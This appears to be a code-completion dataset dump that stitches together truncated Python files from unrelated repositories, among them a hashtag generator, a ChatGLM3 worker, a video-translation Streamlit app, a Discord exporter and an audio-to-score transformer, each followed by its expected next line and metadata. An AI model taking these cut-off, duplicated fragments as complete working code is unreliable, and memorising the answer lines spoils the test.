print(f"\nthe model is {self.args.model_name_or_path} from scratch")
elif args.dataset == 'WHG':
self.model = MT5ForConditionalGeneration.from_pretrained(self.args.model_name_or_path)
print(f"\nthe model is {self.args.model_name_or_path} with pretrained parameters")
def forward(self, input_ids, attention_mask, decoder_input_ids, decoder_attention_mask, labels):
outputs = self.model(input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
labels=labels)
return outputs
def generate(self, batch, num_beams=1):
self.eval()
if self.args.dataset == 'WHG':
with torch.no_grad():
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
num_return_sequences=num_beams
)
decs = [self.tokenizer.decode(ids, skip_special_tokens=True) for ids in outputs]
dec = []
batch_size = len(batch['src'])
for bs in range(batch_size):
hashtag_str = ''
for d in range(bs * num_beams, (bs+1) * num_beams, 1):
hashtag_str = hashtag_str + decs[d] + ' ' + SEP + ' '
hashtag_str = hashtag_str[:(len(SEP) + 2) * (-1)].strip()
dec.append(hashtag_str)
else:
with torch.no_grad():
# if num_beams == 1:
# self.model._cache_input_ids = batch['source_ids'].to(self.args.device)
# else:
# expanded_return_idx = (
# torch.arange(batch['source_ids'].shape[0]).view(-1, 1).repeat(1, num_beams).view(-1).to(
# self.to(self.args.device))
# )
# input_ids = batch['source_ids'].index_select(0, expanded_return_idx)
# self.model._cache_input_ids = input_ids.to(self.args.device)
outputs = self.model.generate(batch['source_ids'].to(self.args.device),
attention_mask=batch['source_mask'].to(self.args.device),
num_beams=num_beams,
max_length=self.args.max_target_length,
)
# decode outputs
sequences = outputs
dec = [self.tokenizer.decode(ids, skip_special_tokens=False, clean_up_tokenization_spaces=False) for ids in
sequences]
for d in range(len(dec)):
dec[d] = dec[d].replace('<pad>', '')
dec[d] = dec[d].replace('</s>', '').strip()
result = extracte_hashtags_from_sequence(dec[d])
dec[d] = ""
if len(result) == 0:
dec[d] = "None"
else:
for res in result:
dec[d] = dec[d] + res + " " + SEP + " "
dec[d] = dec[d][:(len(SEP) + 2) * (-1)].strip()
self.train()
# the shape is [batch_size, seq_len]
return dec
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_name_or_path", default="./PLM_checkpoint/t5-base", type=str)
parser.add_argument("--device", default='cpu', type=str,)
parser.add_argument("--max_target_length", default=100, type=int)
args = parser.parse_args()
tokenizer = T5Tokenizer.from_pretrained('PLM_checkpoint/t5-base')
model = GenerativeModel(args, tokenizer)
src_path = 'data/THG_twitter/twitter.2021.valid.src'
dst_path = 'data/THG_twitter/twitter.2021.valid.dst' | datasets = Twitter_THG(tokenizer, src_path, dst_path) | 0 | 2023-12-16 06:00:53+00:00 | 4k |
shell-nlp/gpt_server | gpt_server/model_worker/chatglm3.py | [
{
"identifier": "conv2messages",
"path": "gpt_server/model_handler/chatglm3.py",
"snippet": "def conv2messages(prompt):\n # 去除多余的换行符和空格\n prompt = prompt.strip()\n\n # 将提示模型转换为列表格式\n messages = []\n segments = prompt.split(\"<|\")\n for segment in segments[1:]:\n role, content =... | import json
import torch
from typing import List
from fastchat.constants import ErrorCode, SERVER_ERROR_MSG
from transformers.generation.logits_process import LogitsProcessor
from gpt_server.model_handler.chatglm3 import conv2messages
from gpt_server.model_worker.base import ModelWorkerBase | 1,835 |
class InvalidScoreLogitsProcessor(LogitsProcessor):
def __call__(
self, input_ids: torch.LongTensor, scores: torch.FloatTensor
) -> torch.FloatTensor:
if torch.isnan(scores).any() or torch.isinf(scores).any():
scores.zero_()
scores[..., 5] = 5e4
return scores
invalid_score_processor = InvalidScoreLogitsProcessor()
|
class InvalidScoreLogitsProcessor(LogitsProcessor):
def __call__(
self, input_ids: torch.LongTensor, scores: torch.FloatTensor
) -> torch.FloatTensor:
if torch.isnan(scores).any() or torch.isinf(scores).any():
scores.zero_()
scores[..., 5] = 5e4
return scores
invalid_score_processor = InvalidScoreLogitsProcessor()
| class ChatGLM3Worker(ModelWorkerBase): | 1 | 2023-12-16 07:43:28+00:00 | 4k |
ilyamiro/Stewart | Core/Core.py | [
{
"identifier": "Synthesizer",
"path": "Audio/synthesizer.py",
"snippet": "class Synthesizer:\n \"\"\"\n Class for synthesizing Stewart voice\n Based on silero-tts v4 model from https://github.com/snakers4/silero-models\n \"\"\"\n\n def __init__(self, speaker=\"eugene\"):\n \"\"\"\... | import json
import os
import random
import threading
import pyautogui
import importlib.util
from Audio.synthesizer import Synthesizer
from Audio.recognition import Voice
from Database.Data import Data
from PluginSystem.Plugin_system import PluginOperation, PluginInfo
from Command_System import *
from LogSystem import core_logger | 3,011 |
pyautogui.FAILSAFE = False
class Core:
def __init__(self):
|
pyautogui.FAILSAFE = False
class Core:
def __init__(self): | core_logger.debug("Core execution started") | 5 | 2023-12-16 12:24:15+00:00 | 4k |
djkcyl/ABot-NT | utils/text2image.py | [
{
"identifier": "AdvertisementCategory",
"path": "models/ad.py",
"snippet": "class AdvertisementCategory(str, Enum):\n business = \"商业\"\n public_welfare = \"公益\"\n announcement = \"公告\"\n tips = \"提示\""
},
{
"identifier": "AiohttpClientService",
"path": "services/aiohttp.py",
... | import asyncio
import hashlib
import random
import re
from base64 import b64encode
from datetime import datetime, timedelta
from io import BytesIO
from pathlib import Path
from graiax.text2img.playwright import (
HTMLRenderer,
MarkdownConverter,
PageOption,
ScreenshotOption,
convert_text,
)
from graiax.text2img.playwright.renderer import BuiltinCSS
from jinja2 import Template
from launart import Launart
from loguru import logger
from PIL import Image, ImageDraw, ImageFont
from playwright.async_api._generated import Request
from qrcode.image.styledpil import StyledPilImage
from qrcode.main import QRCode
from models.ad import AdvertisementCategory
from services import AiohttpClientService, S3FileService
from utils.builder import ADBuilder
from utils.datetime import CHINA_TZ
from .fonts_provider import fill_font
from .strings import get_cut_str | 2,936 |
# 广告出现的概率
DEFAULT_AD_PROBABILITY = 0.7
font_file = "./static/font/sarasa-mono-sc-semibold.ttf"
font = ImageFont.truetype(font_file, 22)
cache = Path("cache", "t2i")
cache.mkdir(exist_ok=True, parents=True)
qrcode = QRCode(image_factory=StyledPilImage)
qrcode.add_data("https://qun.qq.com/qunpro/robot/share?robot_appid=101985270")
invite_guild: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_guild.save(bio, format="PNG")
guild_b64 = b64encode(bio.getvalue()).decode()
qrcode.clear()
qrcode.add_data("https://qun.qq.com/qunpro/robot/qunshare?robot_appid=101985270&robot_uin=2854214511")
invite_group: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_group.save(bio, format="PNG")
group_b64 = b64encode(bio.getvalue()).decode()
footer_css = Path("./static/css/footer.css").read_text()
html_render = HTMLRenderer(
page_option=PageOption(device_scale_factor=1.5),
screenshot_option=ScreenshotOption(type="jpeg", quality=80, full_page=True, scale="device"),
css=(
BuiltinCSS.reset,
BuiltinCSS.github,
BuiltinCSS.one_dark,
BuiltinCSS.container,
"@font-face{font-family:'harmo';font-weight:300;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Light.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:400;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Regular.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:500;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Medium.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:600;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Bold.ttf') format('truetype');}"
"*{font-family:'harmo',sans-serif}",
"body{background-color:#fafafac0;}",
"@media(prefers-color-scheme:light){.markdown-body{--color-canvas-default:#fafafac0;}}",
footer_css,
),
page_modifiers=[
|
# 广告出现的概率
DEFAULT_AD_PROBABILITY = 0.7
font_file = "./static/font/sarasa-mono-sc-semibold.ttf"
font = ImageFont.truetype(font_file, 22)
cache = Path("cache", "t2i")
cache.mkdir(exist_ok=True, parents=True)
qrcode = QRCode(image_factory=StyledPilImage)
qrcode.add_data("https://qun.qq.com/qunpro/robot/share?robot_appid=101985270")
invite_guild: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_guild.save(bio, format="PNG")
guild_b64 = b64encode(bio.getvalue()).decode()
qrcode.clear()
qrcode.add_data("https://qun.qq.com/qunpro/robot/qunshare?robot_appid=101985270&robot_uin=2854214511")
invite_group: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_group.save(bio, format="PNG")
group_b64 = b64encode(bio.getvalue()).decode()
footer_css = Path("./static/css/footer.css").read_text()
html_render = HTMLRenderer(
page_option=PageOption(device_scale_factor=1.5),
screenshot_option=ScreenshotOption(type="jpeg", quality=80, full_page=True, scale="device"),
css=(
BuiltinCSS.reset,
BuiltinCSS.github,
BuiltinCSS.one_dark,
BuiltinCSS.container,
"@font-face{font-family:'harmo';font-weight:300;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Light.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:400;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Regular.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:500;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Medium.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:600;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Bold.ttf') format('truetype');}"
"*{font-family:'harmo',sans-serif}",
"body{background-color:#fafafac0;}",
"@media(prefers-color-scheme:light){.markdown-body{--color-canvas-default:#fafafac0;}}",
footer_css,
),
page_modifiers=[ | lambda page: page.route(re.compile("^http://font.static.abot/(.+)$"), fill_font), | 5 | 2023-12-16 13:19:56+00:00 | 4k |
Chenyme/Chenyme-AAMT | AAMT.py | [
{
"identifier": "generate_srt_from_result",
"path": "utils/utils.py",
"snippet": "def generate_srt_from_result(result): # 格式化为SRT字幕的形式\r\n segments = result['segments']\r\n srt_content = ''\r\n segment_id = 1\r\n for segment in segments:\r\n start_time = int(segment['start'] * 1000)\... | import os
import json
import streamlit as st
import whisper
from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size
| 2,123 | # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
srt_content = generate_srt_from_result(result) # 生成SRT字幕内容
with open(cache_dir + "output.srt", 'w', encoding='utf-8') as srt_file: # 将SRT内容写入SRT文件
srt_file.write(srt_content)
srt_mv(cache_dir)
if st.download_button(
label="Click to Download SRT",
data=srt_content.encode('utf-8'),
key='srt_download',
file_name=cache_dir + 'output.srt',
mime='text/srt',
):
st.success("下载成功")
video_file = open(cache_dir + "output.mp4", 'rb')
video_bytes = video_file.read()
st.video(video_bytes)
else:
st.error("请先上传视频!")
# 全局设置
with tab2:
openai_api_key = config["openai_key"]
openai_api_base = config["openai_base"]
whisper_model = config["whisper_model_default"]
st.write("#### Whisper识别设置")
model = {'tiny': 0, 'base': 1, 'small': 2, 'medium': 3, 'large': 4}
option = st.selectbox('选择你要使用的识别模型', ('tiny', 'base', 'small', 'medium', 'large'), index=model[whisper_model])
if option != whisper_model:
config["whisper_model_default"] = option
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("默认模型已切换为:" + option)
st.write("#### OPENAI设置")
new_key = st.text_input("OPENAI-API-KEY:")
new_base = st.text_input("OPENAI-API-BASE:")
if st.button("保存"):
if new_base != openai_api_base and new_base != "":
config["openai_base"] = new_base
openai_api_base = new_base
if new_key != openai_api_key and new_key != "":
config["openai_key"] = new_key
openai_api_key = new_key
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("已保存")
st.write("#### 本地缓存")
| # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
srt_content = generate_srt_from_result(result) # 生成SRT字幕内容
with open(cache_dir + "output.srt", 'w', encoding='utf-8') as srt_file: # 将SRT内容写入SRT文件
srt_file.write(srt_content)
srt_mv(cache_dir)
if st.download_button(
label="Click to Download SRT",
data=srt_content.encode('utf-8'),
key='srt_download',
file_name=cache_dir + 'output.srt',
mime='text/srt',
):
st.success("下载成功")
video_file = open(cache_dir + "output.mp4", 'rb')
video_bytes = video_file.read()
st.video(video_bytes)
else:
st.error("请先上传视频!")
# 全局设置
with tab2:
openai_api_key = config["openai_key"]
openai_api_base = config["openai_base"]
whisper_model = config["whisper_model_default"]
st.write("#### Whisper识别设置")
model = {'tiny': 0, 'base': 1, 'small': 2, 'medium': 3, 'large': 4}
option = st.selectbox('选择你要使用的识别模型', ('tiny', 'base', 'small', 'medium', 'large'), index=model[whisper_model])
if option != whisper_model:
config["whisper_model_default"] = option
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("默认模型已切换为:" + option)
st.write("#### OPENAI设置")
new_key = st.text_input("OPENAI-API-KEY:")
new_base = st.text_input("OPENAI-API-BASE:")
if st.button("保存"):
if new_base != openai_api_base and new_base != "":
config["openai_base"] = new_base
openai_api_base = new_base
if new_key != openai_api_key and new_key != "":
config["openai_key"] = new_key
openai_api_key = new_key
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("已保存")
st.write("#### 本地缓存")
| st.write(f"本地缓存已占用:{convert_size(cache(cache_dir))}")
| 4 | 2023-12-18 04:06:03+00:00 | 4k |
allenai/marg-reviewer | review_worker/aries/util/edit.py | [
{
"identifier": "colorify",
"path": "review_worker/aries/util/color.py",
"snippet": "def colorify(s: str, color: str, bold: bool = False, form=\"html\", tag_side=\"both\"):\n \"\"\"if tag_side is 'left', only the left tag is added. If tag_side irght\n 'right', only the right tag is added. This i... | import collections
import difflib
import itertools
import numpy as np
import tqdm
from typing import Iterable, List, Tuple, Union
from cffi import FFI
from .color import colorify, colorprint
from _levenshtein import ffi, lib | 2,495 |
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"):
|
def init_levenshtein_c():
ffibuilder = FFI()
ffibuilder.set_source(
"_levenshtein",
r"""
int levenshtein(int *seq1, int seq1_len, int *seq2, int seq2_len, int *v0)
{
// Adapted from https://en.wikipedia.org/wiki/Levenshtein_distance (CC-BY-SA)
// v0 is just a buffer for temporary calculations; easier to
// ask the caller to allocate it than to deal with C mem
// management
int substitutionCost, insertionCost, deletionCost;
int tmpval;
for (int i = 0; i < seq2_len+1; i++) {
v0[i] = i;
}
for (int i = 0; i < seq1_len; i++) {
// calculate v1 (current row distances) from the previous row v0
// first element of v1 is A[i+1][0]
// edit distance is delete (i+1) chars from s to match empty t
tmpval = i + 1;
// use formula to fill in the rest of the row
for(int j = 0; j < seq2_len; j++) {
// calculating costs for A[i+1][j+1]
deletionCost = v0[j + 1] + 1;
insertionCost = tmpval + 1;
substitutionCost = v0[j];
if (seq1[i] != seq2[j]) {
substitutionCost++;
}
v0[j] = tmpval;
tmpval = deletionCost;
if (insertionCost < tmpval) {
tmpval = insertionCost;
}
if (substitutionCost < tmpval) {
tmpval = substitutionCost;
}
}
v0[seq2_len] = tmpval;
}
// after the last swap, the results of v1 are now in v0
return v0[seq2_len];
}
""",
)
ffibuilder.cdef("int levenshtein(int*, int, int*, int, int*);")
# Compile the C module and import it
ffibuilder.compile(verbose=True)
return ffi, lib
levenshtein_ffi, levenshtein_lib = None, None
def levenshtein_distance(seq1, seq2):
# We call a C function for levenshtein via CFFI because it is about 1000x
# faster than the python version (the difference between running in an hour
# vs running in a month)
global levenshtein_ffi, levenshtein_lib
if levenshtein_ffi is None:
levenshtein_ffi, levenshtein_lib = init_levenshtein_c()
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"): | s += colorify(prevtok + "]", color=color_for_tok(prevtok), form=color_format) | 0 | 2023-12-20 06:54:14+00:00 | 4k |
Varexa/Gateway | chat_exporter/construct/transcript.py | [
{
"identifier": "discord",
"path": "chat_exporter/ext/discord_import.py",
"snippet": ""
},
{
"identifier": "gather_messages",
"path": "chat_exporter/construct/message.py",
"snippet": "async def gather_messages(\r\n messages: List[discord.Message],\r\n guild: discord.Guild,\r\n p... | import datetime
import html
import traceback
import pytz
from typing import List, Optional
from chat_exporter.ext.discord_import import discord
from chat_exporter.construct.message import gather_messages
from chat_exporter.construct.assets.component import Component
from chat_exporter.ext.cache import clear_cache
from chat_exporter.parse.mention import pass_bot
from chat_exporter.ext.discord_utils import DiscordUtils
from chat_exporter.ext.html_generator import (
fill_out, total, channel_topic, meta_data_temp, fancy_time, channel_subject, PARSE_MODE_NONE
)
| 1,976 |
class TranscriptDAO:
html: str
def __init__(
self,
|
class TranscriptDAO:
html: str
def __init__(
self,
| channel: discord.TextChannel,
| 0 | 2023-12-18 14:17:31+00:00 | 4k |
mariaalfaroc/a2s-transformer | networks/transformer/model.py | [
{
"identifier": "Decoder",
"path": "networks/transformer/decoder.py",
"snippet": "class Decoder(nn.Module):\n def __init__(\n self,\n # Classification layer\n output_size: int,\n # PE\n max_seq_len: int,\n # Embedding\n num_embeddings: int,\n em... | import math
import random
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torchinfo import summary
from lightning.pytorch import LightningModule
from networks.transformer.decoder import Decoder
from networks.transformer.encoder import Encoder, HEIGHT_REDUCTION, WIDTH_REDUCTION
from my_utils.metrics import compute_metrics
from my_utils.data_preprocessing import IMG_HEIGHT, NUM_CHANNELS
from my_utils.ar_dataset import SOS_TOKEN, EOS_TOKEN | 2,864 |
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
